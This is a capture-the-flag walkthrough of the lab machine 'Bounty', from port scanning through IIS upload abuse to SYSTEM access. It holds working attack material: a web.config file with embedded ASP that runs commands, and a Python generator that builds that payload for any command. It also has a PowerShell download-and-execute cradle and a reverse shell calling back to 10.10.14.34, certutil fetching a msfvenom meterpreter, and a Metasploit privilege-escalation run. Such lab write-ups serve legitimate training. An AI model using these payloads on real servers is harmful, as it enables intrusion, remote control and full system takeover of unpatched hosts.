Bounty

From Luniwiki

Bounty01.png


Ports scan

masscan over the full TCP and UDP port range finds only port 80 open.

root@kali:~/HTB/Machines/Bounty# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.93 --rate=1000

Starting masscan 1.0.5 at 2019-11-30 14:50:52 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.93

nmap

root@kali:~/HTB/Machines/Bounty# nmap -sC -sV 10.10.10.93
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-30 19:02 EST
Nmap scan report for bounty.htb (10.10.10.93)
Host is up (0.044s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.62 seconds

IIS 7.5 shipped with Windows 7 and Windows Server 2008 R2, so the target is most likely a Server 2008 R2 host; the TRACE method flagged by nmap is only informational here.

Web enumeration

Main page

Bounty02.png

root@kali:~/HTB/Machines/Bounty# curl -v http://10.10.10.93/
*   Trying 10.10.10.93:80...
* TCP_NODELAY set
* Connected to 10.10.10.93 (10.10.10.93) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.93
> User-Agent: curl/7.66.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Content-Type: text/html
< Last-Modified: Thu, 31 May 2018 03:46:26 GMT
< Accept-Ranges: bytes
< ETag: "20ba8ef391f8d31:0"
< Server: Microsoft-IIS/7.5
< X-Powered-By: ASP.NET
< Date: Sun, 01 Dec 2019 00:32:01 GMT
< Content-Length: 630
<
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Bounty</title>
<style type="text/css">
<!--
body {
        color:#000000;
        background-color:#B3B3B3;
        margin:0;
}

#container { margin-left:auto; margin-right:auto; text-align:center; }
a img { border:none; }
-->
</style>
</head>
<body>
<div id="container">
<a href=""><img src="merlin.jpg" alt="IIS7" width="571" height="411" /></a>
</div>
</body>
* Connection #0 to host 10.10.10.93 left intact
</html>

The page is static: only the Server and X-Powered-By headers (IIS 7.5, ASP.NET) are useful. The image does not give more information.

root@kali:~/HTB/Machines/Bounty# wget http://bounty.htb/merlin.jpg
--2019-11-30 10:08:28--  http://bounty.htb/merlin.jpg
Resolving bounty.htb (bounty.htb)... 10.10.10.93
Connecting to bounty.htb (bounty.htb)|10.10.10.93|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 780732 (762K) [image/jpeg]
Saving to: ‘merlin.jpg’

merlin.jpg 100%[===================>] 762.43K 1.69MB/s in 0.4s

2019-11-30 10:08:28 (1.69 MB/s) - ‘merlin.jpg’ saved [780732/780732]

root@kali:~/HTB/Machines/Bounty# strings merlin.jpg

Dirsearch

The first search uses the big (medium) wordlist with only the txt extension and -f (force extensions and directory variants) to discover the site structure. 1000 threads is aggressive; lower it on a rate-limited or noisy target.

root@kali:~/HTB/Machines/Bounty# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt" -f -t 1000 -u http://10.10.10.93
 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: txt | HTTP method: get | Threads: 1000 | Wordlist size: 441041
Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-30_10-20-05.log
Target: http://10.10.10.93
[10:20:05] Starting:
[10:21:42] 403 - 1KB - /UploadedFiles/
[10:22:00] 403 - 1KB - /uploadedFiles/
[10:23:23] 403 - 1KB - /uploadedfiles/
Task Completed

There is a folder /uploadedfiles/ (403 because directory listing is disabled, not because it is unreachable). The second iteration uses more extensions (php, asp, aspx, js) but the smaller wordlist. The 400 responses come from wordlist entries containing characters IIS rejects in a URL (such as * and :) and are noise.

root@kali:~/HTB/Machines/Bounty# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e "php,asp,aspx,js" -f -t 1000 -u http://10.10.10.93
 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, js | HTTP method: get | Threads: 1000 | Wordlist size: 438229
Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-30_10-35-30.log
Target: http://10.10.10.93
[10:35:30] Starting:
[10:36:06] 200 - 974B - /transfer.aspx
[10:36:29] 400 - 11B - /%2Acheckout%2A.aspx
[10:37:28] 400 - 11B - /%2Adocroot%2A.aspx
[10:37:46] 400 - 11B - /%2A.aspx
[10:38:12] 400 - 11B - /http%3A%2F%2Fwww.aspx
[10:39:04] 400 - 11B - /q%26a.aspx
[10:39:06] 400 - 11B - /http%3A.aspx
[10:39:49] 400 - 11B - /%2A%2Ahttp%3a.aspx
[10:39:56] 403 - 1KB - /UploadedFiles/
[10:40:25] 403 - 1KB - /uploadedFiles/
[10:41:27] 400 - 11B - /%2Ahttp%3A.aspx
[10:42:39] 400 - 11B - /%2A%2Ahttp%3A.aspx
[10:42:54] 403 - 1KB - /uploadedfiles/
[10:43:20] 400 - 11B - /http%3A%2F%2Fyoutube.aspx
[10:43:21] 400 - 11B - /http%3A%2F%2Fblogs.aspx
[10:43:22] 400 - 11B - /http%3A%2F%2Fblog.aspx
[10:44:44] 400 - 11B - /%2A%2Ahttp%3A%2F%2Fwww.aspx
Task Completed

File upload

/transfer.aspx shows a form to upload files.

Bounty03.png

We do a test with a gif file.

Bounty04.png

The file is uploaded successfully.

Bounty05.png

We find the file at the URI /uploadedfiles/test.gif: uploads land in the folder found by dirsearch, and that folder is served back by IIS, so anything we can upload is also reachable over HTTP.

Bounty06.png

We try to upload an aspx file.

root@kali:~/HTB/Machines/Bounty# echo test > test.aspx

Bounty07.png

But, as expected, this extension is not allowed: the upload handler filters on the file extension.

Bounty08.png

Determine allowed extensions

The web page https://docs.microsoft.com/en-us/previous-versions/2wawkw1c(v=vs.140)?redirectedfrom=MSDN provides the list of file extensions handled by ASP.NET on IIS 7. We scrape it into a wordlist:

Bounty09.png

root@kali:~/HTB/Machines/Bounty# curl -q "https://docs.microsoft.com/en-us/previous-versions/2wawkw1c(v=vs.140)?redirectedfrom=MSDN" 2>/dev/null | grep "<td><p>\..*</p></td>" | cut -d '>' -f 3 | cut -d '<' -f 1 | sed 's/, /\n/g' | cut -c 2- > extensions.lst
root@kali:~/HTB/Machines/Bounty# cat extensions.lst
asax
ascx
ashx
asmx
aspx
axd
browser
cd
compile
config
cs
vb
csproj
vbproj
disco
vsdisco
dsdgm
dsprototype
dll
licx
webinfo
master
mdb
ldb
mdf
msgx
svc
resources
resx
sdm
sdmDocument
sitemap
skin
sln
soap
asa
cdx
cer
idc
shtm
shtml
stm
css
htm
html
jpg
jpeg
png
tiff
bmp
svg
gif
ico
tga
xcf
dwg
pdf

root@kali:~/HTB/Machines/Bounty# echo test > test.txt

We upload a test file.

Bounty10.png

We intercept the request, and we send it to Intruder module.

Bounty11.png

Clear the fields, and select the file extension as payload.

Bounty12.png

Load the extensions as payload from file.

Bounty14.png

Add a Grep - Extract rule that fetches the text between '<span id="Label1" style="color:' and '</span>' (the result label).

Bounty13.png

Run the attack: the extracted label reads "File Uploaded successfully." for the allowed extensions.

Bounty15.png

Sort the results by the extracted label to group the successful extensions.

Bounty16.png

We can upload files with these extensions:

  • config
  • jpg
  • jpeg
  • png
  • gif
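The Intruder run above can be replayed as a script. The following Python is an added example, not part of the original write-up: it fetches transfer.aspx, collects the ASP.NET hidden fields (__VIEWSTATE, __EVENTVALIDATION) that a WebForms POST needs, uploads test.<ext> for every extension in extensions.lst and reads the Label1 span that the Grep - Extract rule used. The file field name FileUpload1, the button name btnUpload and the error text used in the offline check are assumptions; the success text "File Uploaded successfully." is the one shown on the page.

```python
# Added example: scripted replay of the Burp Intruder extension fuzz.
# Field names FileUpload1 / btnUpload are assumptions about transfer.aspx.
import re
import uuid
import urllib.request
from html import unescape

# ASP.NET renders hidden inputs as: <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="..." />
HIDDEN_RE = re.compile(r'<input[^>]+type="hidden"[^>]+name="([^"]+)"[^>]*value="([^"]*)"', re.I)
# The result label the Burp rule extracted: <span id="Label1" style="color:...">text</span>
LABEL_RE = re.compile(r'<span id="Label1"[^>]*>(.*?)</span>', re.I | re.S)


def hidden_fields(html):
    """Collect the WebForms hidden inputs (__VIEWSTATE, __EVENTVALIDATION, ...).
    Without them ASP.NET rejects the POST before the upload code runs."""
    return {name: unescape(value) for name, value in HIDDEN_RE.findall(html)}


def build_multipart(fields, file_field, filename, content, boundary=None):
    """Encode text fields plus one file as multipart/form-data.
    Returns (body_bytes, content_type_header)."""
    boundary = boundary or uuid.uuid4().hex
    parts = []
    for name, value in fields.items():
        parts += ["--" + boundary,
                  'Content-Disposition: form-data; name="%s"' % name, "", value]
    parts += ["--" + boundary,
              'Content-Disposition: form-data; name="%s"; filename="%s"' % (file_field, filename),
              "Content-Type: application/octet-stream", "", content,
              "--" + boundary + "--", ""]
    return "\r\n".join(parts).encode("utf-8"), "multipart/form-data; boundary=" + boundary


def upload_status(html):
    """Return the Label1 text ("File Uploaded successfully." or the error message)."""
    m = LABEL_RE.search(html)
    return unescape(m.group(1)).strip() if m else ""


def http_get(url):
    with urllib.request.urlopen(url, timeout=15) as resp:
        return resp.read().decode("utf-8", "replace")


def http_post(url, body, content_type):
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", content_type)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode("utf-8", "replace")


def fuzz_extensions(url, extensions, get=http_get, post=http_post,
                    file_field="FileUpload1", button="btnUpload",
                    success="File Uploaded successfully."):
    """Upload test.<ext> for every extension and return the ones the server accepted.
    get/post are injectable so the logic can be exercised offline."""
    allowed = []
    for ext in extensions:
        fields = hidden_fields(get(url))   # fresh __VIEWSTATE / __EVENTVALIDATION per attempt
        fields[button] = "Upload"          # submit button name/value (assumption)
        body, ctype = build_multipart(fields, file_field, "test." + ext, "test")
        if upload_status(post(url, body, ctype)) == success:
            allowed.append(ext)
    return allowed


if __name__ == "__main__":
    with open("extensions.lst") as fh:
        exts = [line.strip() for line in fh if line.strip()]
    print(fuzz_extensions("http://10.10.10.93/transfer.aspx", exts))
```

Re-fetching the form before every upload matters: a stale or missing __EVENTVALIDATION makes ASP.NET reject the POST before the upload handler runs, which would look exactly like a blocked extension.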

RCE with web.config

Soroush Dalili's article "Upload a web.config file for fun & profit" (https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/) explains how to get code execution from an uploaded web.config. IIS reads the file as the configuration of the upload directory, so it can register *.config files to be processed by the classic ASP engine (asp.dll) and remove the request-filtering rules that normally block access to web.config. The ASP code itself sits in an XML comment at the end of the file: the configuration parser ignores it, but asp.dll executes it when the file is requested.

Test

root@kali:~/HTB/Machines/Bounty# cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- ASP code comes here! It must not contain the HTML comment closing tag or double dashes!
<%
Response.write("-"&"->")
' the ASP code is running if you see 7 (not 3+4) when you open the web.config file
Response.write(3+4)
Response.write("<!-"&"-")
%>
-->

Bounty17.png

Bounty18.png

The code is executed: the page shows 7, the result of 3+4, instead of the literal expression. A web.config that was merely served as a file would come back as raw XML, or not at all.

Execute systeminfo

root@kali:~/HTB/Machines/Bounty# cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- ASP code comes here! It must not contain the HTML comment closing tag or double dashes!
<%
Response.write("-"&"->")
' run the command through WScript.Shell and write its output inside a <pre> block
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c systeminfo")
output1 = cmd1.StdOut.Readall()
Response.write(output1)
Response.write("</pre><!-"&"-")
%>
-->

Bounty19.png
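As an added example (not from the write-up or from Dalili's post), the following Python script generates this web.config for an arbitrary command and extracts the command output from the response. It refuses commands containing "--", which would terminate the XML comment and make IIS reject the whole file, checks that the result is still well-formed XML before it is uploaded, and pulls the output from between the <pre> tags the ASP writes. The handler attributes and request-filtering removals are the ones shown above; the validation and the output parsing are mine.

```python
# Added example: generate the web.config RCE payload and parse its output.
import re
import xml.etree.ElementTree as ET

# IIS part, copied from the payload above: map *.config to the classic ASP ISAPI
# and remove the request-filtering rules that normally hide web.config.
HANDLER_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
"""

# ASP part, inside an XML comment so the config parser ignores it. "-->" and
# "<!--" are emitted in two pieces so the comment never closes inside the code.
ASP_TEMPLATE = """<!--
<%
Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c {cmd}")
Response.write(cmd1.StdOut.Readall())
Response.write("</pre><!-"&"-")
%>
-->
"""

PRE_RE = re.compile(r"<pre>(.*?)</pre>", re.S)


def validate_config(text):
    """IIS refuses a web.config that is not well-formed XML (every request in that
    directory then fails with 500), so parse it before uploading. A comment after
    the root element is legal XML, but "--" inside the comment is not."""
    ET.fromstring(text.encode("utf-8"))
    return True


def build_web_config(cmd):
    """Return web.config text that runs `cmd` (via cmd /c) when the file is requested."""
    vb_cmd = cmd.replace('"', '""')   # VBScript string-literal escaping
    if "--" in vb_cmd:
        raise ValueError("command must not contain '--': it would break the XML comment")
    text = HANDLER_CONFIG + ASP_TEMPLATE.replace("{cmd}", vb_cmd)
    validate_config(text)
    return text


def extract_output(response_text):
    """Pull the command output from the rendered page (between the <pre> tags the
    ASP writes). Returns None when the ASP did not run, e.g. the server returned
    the file as plain XML or an error page."""
    m = PRE_RE.search(response_text)
    return m.group(1) if m else None


if __name__ == "__main__":
    import sys
    cmd = " ".join(sys.argv[1:]) or "whoami"
    with open("web.config", "w", newline="") as fh:
        fh.write(build_web_config(cmd))
    print("wrote web.config running: " + cmd)
```

Run it as `python3 gen.py systeminfo`, upload the resulting web.config through transfer.aspx, request /uploadedfiles/web.config and feed the response to extract_output. The "--" restriction is the practical limit of this technique: PowerShell long options and comment markers must be avoided or pulled in from a downloaded script, as the reverse-shell variant below does.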

Gain a reverse shell

root@kali:~/HTB/Machines/Bounty# cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- ASP code comes here! It must not contain the HTML comment closing tag or double dashes!
<%
Response.write("-"&"->")
' start PowerShell, which downloads rs.ps1 from our host and runs it in memory
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.34/rs.ps1')")
output1 = cmd1.StdOut.Readall()
Response.write(output1)
Response.write("</pre><!-"&"-")
%>
-->

When the uploaded web.config is requested, the ASP code starts PowerShell, which downloads rs.ps1 from our web server and runs it in memory with IEX (Invoke-Expression); nothing is written to disk on the target.

root@kali:~/HTB/Machines/Bounty# cat rs.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.34',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Start the web server that serves rs.ps1 on port 80.

root@kali:~/HTB/Machines/Bounty# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Start the listener on port 4444.

root@kali:~/HTB/Machines/Bounty# rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Browse the URL of the uploaded web.config.

Bounty20.png

The file rs.ps1 is downloaded:

root@kali:~/HTB/Machines/Bounty# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.93 - - [02/Dec/2019 00:37:54] "GET /rs.ps1 HTTP/1.1" 200 -

A reverse PowerShell connects at the same moment, running as bounty\merlin (the identity the IIS worker process runs under).

root@kali:~/HTB/Machines/Bounty# rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.93.
Ncat: Connection from 10.10.10.93:49158.
whoami
bounty\merlin
PS C:\windows\system32\inetsrv>

User flag

PS C:\windows\system32\inetsrv> cd C:\
PS C:\> cd Users\merlin\Desktop
PS C:\Users\merlin\Desktop> cat user.txt
<USER_FLAG>

Privilege escalation

Reverse meterpreter

Create the reverse meterpreter.

root@kali:~/HTB/Machines/Bounty# msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.34 LPORT=5555 -f exe -o metasploit.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 206403 bytes
Final size of exe file: 212992 bytes
Saved as: metasploit.exe

Check that the web server is still listening, then run certutil on the target to download the file.

PS C:\windows\system32\inetsrv> cd c:\users\merlin
PS C:\users\merlin> certutil -urlcache -split -f "http://10.10.14.34/metasploit.exe" metasploit.exe
****  Online  ****
 000000  ...
 034000
CertUtil: -URLCache command completed successfully.

The web server logs two GET requests for the file.

root@kali:~/HTB/Machines/Bounty# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.93 - - [02/Dec/2019 00:37:54] "GET /rs.ps1 HTTP/1.1" 200 -
10.10.10.93 - - [03/Dec/2019 10:54:38] "GET /metasploit.exe HTTP/1.1" 200 -
10.10.10.93 - - [03/Dec/2019 10:54:39] "GET /metasploit.exe HTTP/1.1" 200 -

Start msfconsole and run a handler on port 5555. The handler's payload has to match the one generated with msfvenom (windows/x64/meterpreter_reverse_tcp); set it with "set payload" if your default differs.

root@kali:~/HTB/Machines/Bounty# msfconsole
msf5 > use multi/handler
msf5 exploit(multi/handler) > set LHOST 10.10.14.34
LHOST => 10.10.14.34
msf5 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.34:5555

Start the reverse meterpreter.

PS C:\users\merlin> cmd /c metasploit.exe

The Meterpreter session opens:

[*] Sending stage (180291 bytes) to 10.10.10.93
[*] Meterpreter session 1 opened (10.10.14.34:5555 -> 10.10.10.93:49171) at 2019-12-03 11:20:35 -0500

meterpreter > getuid
Server username: BOUNTY\merlin

Exploit to escalate

The Meterpreter session runs as merlin; now we need to escalate. Background the session and run the local exploit suggester against it.

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester

msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.93 - Collecting local exploits for x64/windows...
[*] 10.10.10.93 - 13 exploit checks are being tried...
[+] 10.10.10.93 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_092_schelevator
msf5 exploit(windows/local/ms10_092_schelevator) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms10_092_schelevator) > set LHOST 10.10.14.34
LHOST => 10.10.14.34
msf5 exploit(windows/local/ms10_092_schelevator) > set LPORT 6666
LPORT => 6666
msf5 exploit(windows/local/ms10_092_schelevator) > run

[*] Started reverse TCP handler on 10.10.14.34:6666
[*] Preparing payload at C:\Windows\TEMP\TKeIxip.exe
[*] Creating task: RT4ADIUWBKw89
[*] SUCCESS: The scheduled task "RT4ADIUWBKw89" has successfully been created.
[*] SCHELEVATOR
[*] Reading the task file contents from C:\Windows\system32\tasks\RT4ADIUWBKw89...
[*] Original CRC32: 0xfc4dee90
[*] Final CRC32: 0xfc4dee90
[*] Writing our modified content back...
[*] Validating task: RT4ADIUWBKw89
[*]
[*] Folder: \
[*] TaskName                                 Next Run Time          Status
[*] ======================================== ====================== ===============
[*] RT4ADIUWBKw89                            1/1/2020 8:47:00 AM    Ready
[*] SCHELEVATOR
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "RT4ADIUWBKw89" have been changed.
[*] SCHELEVATOR
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "RT4ADIUWBKw89" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] Sending stage (180291 bytes) to 10.10.10.93
[*] SUCCESS: Attempted to run the scheduled task "RT4ADIUWBKw89".
[*] SCHELEVATOR
[*] Deleting the task...
[*] Meterpreter session 2 opened (10.10.14.34:6666 -> 10.10.10.93:49163) at 2019-12-02 01:47:08 -0500
[*] SUCCESS: The scheduled task "RT4ADIUWBKw89" was successfully deleted.
[*] SCHELEVATOR

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

The host is vulnerable to many exploits (because it is not patched: the build is 6.1.7600, Server 2008 R2 without a service pack). I stopped after 3 exploits.

msf5 exploit(windows/local/ms16_075_reflection_juicy) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                        Connection
  --  ----  ----                     -----------                                                                        ----------
  1         meterpreter x64/windows  BOUNTY\merlin @ BOUNTY                                                             10.10.14.34:5555 -> 10.10.10.93:49161 (10.10.10.93)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ BOUNTY                                                       10.10.14.34:6666 -> 10.10.10.93:49163 (10.10.10.93)
  3         shell x64/windows        Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation...   10.10.14.34:7777 -> 10.10.10.93:49165 (10.10.10.93)
  4         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ BOUNTY                                                       10.10.14.34:8888 -> 10.10.10.93:49183 (10.10.10.93)

Root Flag

meterpreter > shell
Process 284 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd C:\Users

C:\Users>cd Administrator

C:\Users\Administrator>cd Desktop

C:\Users\Administrator\Desktop>type root.txt
<ROOT_FLAG>

References

  • Soroush Dalili, "Upload a web.config file for fun & profit": https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/
  • Microsoft Docs, file extensions handled by ASP.NET on IIS 7 (the page scraped above): https://docs.microsoft.com/en-us/previous-versions/2wawkw1c(v=vs.140)?redirectedfrom=MSDN

Daniel Simao 18:53, 30 November 2019 (EST)